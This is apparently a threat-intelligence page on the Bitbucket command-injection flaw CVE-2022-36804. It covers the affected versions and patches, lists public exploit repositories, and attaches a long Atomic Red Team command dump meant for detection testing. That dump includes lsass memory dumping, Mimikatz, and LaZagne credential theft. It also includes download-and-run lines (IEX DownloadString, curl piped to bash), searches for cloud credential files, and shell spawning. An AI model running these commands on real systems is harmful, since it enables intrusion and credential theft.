CVE-2022-36804
Overview
This vulnerability is a remote command injection affecting multiple API endpoints in Atlassian Bitbucket Server and Data Center. The root cause lies in improper input validation and sanitization of parameters within API requests, allowing crafted HTTP requests to inject and execute arbitrary shell commands. The affected components are specific REST API endpoints handling repository archive and project repository data across various versions of Bitbucket Server and Data Center.
Vulnerability Description
Multiple API endpoints in Atlassian Bitbucket Server and Data Center 7.0.0 before version 7.6.17, from version 7.7.0 before version 7.17.10, from version 7.18.0 before version 7.21.4, from version 8.0.0 before version 8.0.3, from version 8.1.0 before version 8.1.3, and from version 8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1 allows remote attackers with read permissions to a public or private Bitbucket repository to execute arbitrary code by sending a malicious HTTP request. This vulnerability was reported via our Bug Bounty Program by TheGrandPew.
Impact
An attacker with read access to a Bitbucket repository can execute arbitrary system commands on the server hosting Bitbucket, potentially leading to unauthorized data access, modification, and full system compromise. No additional authentication or user interaction beyond read permissions is required, enabling lateral movement and persistent control within affected environments. This can result in exposure of sensitive repository data, disruption of services, and compromise of the underlying infrastructure.
Solution
Apply the patches provided by Atlassian in versions 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.3, 8.2.2, and 8.3.1 or later as detailed in Atlassian's advisory (https://jira.atlassian.com/browse/BSERV-13438). Follow vendor instructions for upgrading affected Bitbucket Server and Data Center instances to these fixed versions. No specific workarounds are documented; upgrading to the patched releases is the recommended remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
Atlassian Bitbucket Server and Data Center versions prior to specific updates exhibit a critical vulnerability that allows remote attackers with read permissions to execute arbitrary code. This flaw arises from improper validation of user input in multiple API endpoints. When a malicious HTTP request is sent to these endpoints, the system fails to adequately sanitize the input, leading to the potential execution of unauthorized commands. The vulnerability is particularly concerning as it affects both public and private repositories, thereby broadening the attack surface for potential exploitation.
Attack vectors for this vulnerability are straightforward yet effective. An attacker with read access to a repository can craft a specially designed HTTP request that exploits the flaw in the API. This could be executed through various means, such as automated scripts or manual requests using tools like cURL or Postman. Once the malicious request is processed, the attacker could gain control over the server, leading to unauthorized data access, modification, or even complete system compromise. Scenarios may include an attacker leveraging this vulnerability to deploy malware, exfiltrate sensitive data, or pivot to other systems within the network, thereby escalating their attack.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on Bitbucket for version control and collaboration. The potential for arbitrary code execution poses a severe business risk, as it can lead to data breaches, loss of intellectual property, and reputational damage. Organizations may face regulatory repercussions if sensitive data is compromised, especially in industries governed by strict compliance standards. Additionally, the financial implications of remediation efforts, incident response, and potential downtime can be substantial, further emphasizing the need for immediate action.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to update to the latest versions of Bitbucket Server and Data Center, as the vendor has released patches addressing this issue. Regularly monitoring for updates and applying them promptly can significantly reduce the risk of exploitation. Additionally, organizations should conduct thorough security assessments, including vulnerability scanning and penetration testing, to identify any potential weaknesses in their configurations. Implementing strict access controls and monitoring API usage can also help in detecting unusual activity that may indicate an attempted exploitation.
In conclusion, the vulnerability affecting Atlassian Bitbucket Server and Data Center represents a serious threat that can lead to severe consequences for organizations. Understanding the technical details, potential attack vectors, and real-world implications is essential for effective risk management. By adopting proactive detection and mitigation strategies, organizations can safeguard their systems and protect sensitive data from malicious actors. The importance of maintaining an updated software environment cannot be overstated, as timely patching is one of the most effective defenses against such vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2022-36804, coinciding with the emergence of multiple new proof-of-concept exploits and a publicly available Metasploit module. This development significantly lowers the technical barrier for threat actors to execute remote code on vulnerable Atlassian Bitbucket Server instances. Our telemetry indicates a notable surge in exploit attempts, reflecting increased adversary interest and operationalization of this vulnerability. The inclusion of CVE-2022-36804 in the CISA Known Exploited Vulnerabilities catalog further underscores its criticality and the urgency for defensive measures. The vulnerability’s CVSS score adjustment to 8.8, coupled with an EPSS score nearing certainty, signals a high likelihood of exploitation in the wild. Collectively, these factors elevate the threat level from theoretical to actively exploited, demanding heightened vigilance from defenders monitoring Bitbucket environments.
Update 2 — July 09, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2022-36804, evidenced by a discernible increase in telemetry signals. This uptick coincides with the emergence of additional proof-of-concept exploits and more sophisticated attack scripts circulating within threat actor communities. Although the EPSS score shows a marginal decline, the practical exploit landscape has expanded, indicating adversaries are refining their operational capabilities against vulnerable Bitbucket Server instances. This evolution underscores a heightened risk of successful remote code execution attacks, particularly given the vulnerability’s persistence in widely deployed versions. Consequently, the threat level has intensified from elevated to critical, emphasizing the imperative for continuous monitoring and rapid detection efforts within affected environments.
Affected Products (7)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Atlassian | Bitbucket | All |
cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Bitbucket | All |
cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Bitbucket | All |
cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Bitbucket | All |
cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Bitbucket | All |
cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Bitbucket | All |
cpe:2.3:a:atlassian:bitbucket:*:*:*:*:*:*:*:*
|
|
|
Atlassian | Bitbucket | 8.3.0 |
cpe:2.3:a:atlassian:bitbucket:8.3.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Bitbucket Git Command Injection
exploits/linux/http/bitbucket_git_cmd_injection
|
TheGrandPew, Ron Bowes, Jang +1 | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Bitbucket v7.0.0 - RCE | khal4n1 | webapps | python | - | View |
GitHub PoCs (19)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
notdls/CVE-2022-36804
A real exploit for BitBucket RCE CVE-2022-36804
|
notdls | 35 | 7 | 2022-09-07 | View |
|
benjaminhays/CVE-2022-36804-PoC-Exploit
Somewhat Reliable PoC Exploit for CVE-2022-36804 (BitBucket Critical Command Injection)
|
benjaminhays | 16 | 10 | 2022-09-20 | View |
|
notxesh/CVE-2022-36804-PoC
Multithreaded exploit script for CVE-2022-36804 affecting BitBucket versions <8.3.1
|
notxesh | 18 | 8 | 2022-09-19 | View |
|
sh4den/CVE-2022-36804
A loader for bitbucket 2022 rce (cve-2022-36804)
|
sh4den | 12 | 4 | 2022-09-26 | View |
|
SystemVll/CVE-2022-36804
A loader for bitbucket 2022 rce (cve-2022-36804)
|
SystemVll | 12 | 4 | 2022-09-26 | View |
|
walnutsecurity/cve-2022-36804
A critical command injection vulnerability was found in multiple API endpoints of the Atlassian Bit bucket Server and Da...
|
walnutsecurity | 8 | 4 | 2023-01-23 | View |
|
ColdFusionX/CVE-2022-36804
Atlassian Bitbucket Server and Data Center - Command Injection Vulnerability (CVE-2022-36804)
|
ColdFusionX | 7 | 5 | 2022-10-04 | View |
|
kljunowsky/CVE-2022-36804-POC
Bitbucket CVE-2022-36804 unauthenticated remote command execution
|
kljunowsky | 7 | 3 | 2022-09-21 | View |
|
tahtaciburak/cve-2022-36804
A simple PoC for Atlassian Bitbucket RCE [CVE-2022-36804]
|
tahtaciburak | 7 | 2 | 2022-09-25 | View |
|
Chocapikk/CVE-2022-36804-ReverseShell
PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection)
|
Chocapikk | 4 | 1 | 2022-09-23 | View |
|
Vulnmachines/bitbucket-cve-2022-36804
CVE-2022-36804 Atlassian Bitbucket Command Injection Vulnerability
|
Vulnmachines | 3 | 1 | 2022-09-20 | View |
|
khal4n1/CVE-2022-36804
You can find a python script to exploit the vulnerability on Bitbucket related CVE-2022-36804.
|
khal4n1 | 3 | 1 | 2022-09-24 | View |
|
0xEleven/CVE-2022-36804-ReverseShell
PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection)
|
0xEleven | 0 | 2 | 2022-09-24 | View |
|
DanielHallbro/CVE-2022-36804-Bitbucket-RCE-Analysis
Full-chain reproduction of CVE-2022-36804 (Bitbucket RCE). Includes a Dockerized laboratory, pspy64 monitoring for null-...
|
DanielHallbro | 0 | 0 | 2026-02-26 | View |
|
JRandomSage/CVE-2022-36804-MASS-RCE
A critical vulnerability (CVE-2022-36804) in Atlassian Bitbucket Server and Data Center could be exploited by unauthoriz...
|
JRandomSage | 0 | 0 | 2022-09-20 | View |
|
asepsaepdin/CVE-2022-36804
|
asepsaepdin | 0 | 0 | 2025-01-30 | View |
|
JohanGabrielson/bitbucket-test
Investigating CVE-2022-36804
|
JohanGabrielson | 0 | 0 | 2026-03-24 | View |
|
devengpk/CVE-2022-36804
|
devengpk | 0 | 0 | 2022-12-20 | View |
|
imbas007/Atlassian-Bitbucket-CVE-2022-36804
|
imbas007 | 0 | 0 | 2023-02-02 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
52%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High | |
| CAPEC-6 | Argument Injection |
45%
|
High | High |
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-36804 |
| jira.atlassian.com |
GitHub CVE
|
https://jira.atlassian.com/browse/BSERV-13438 |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/168470/Bitbucket-Git-Command-Injection.html |
| packetstormsecurity.com |
GitHub CVE
|
http://packetstormsecurity.com/files/171453/Bitbucket-7.0.0-Remote-Command-Execution.html |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-36804 |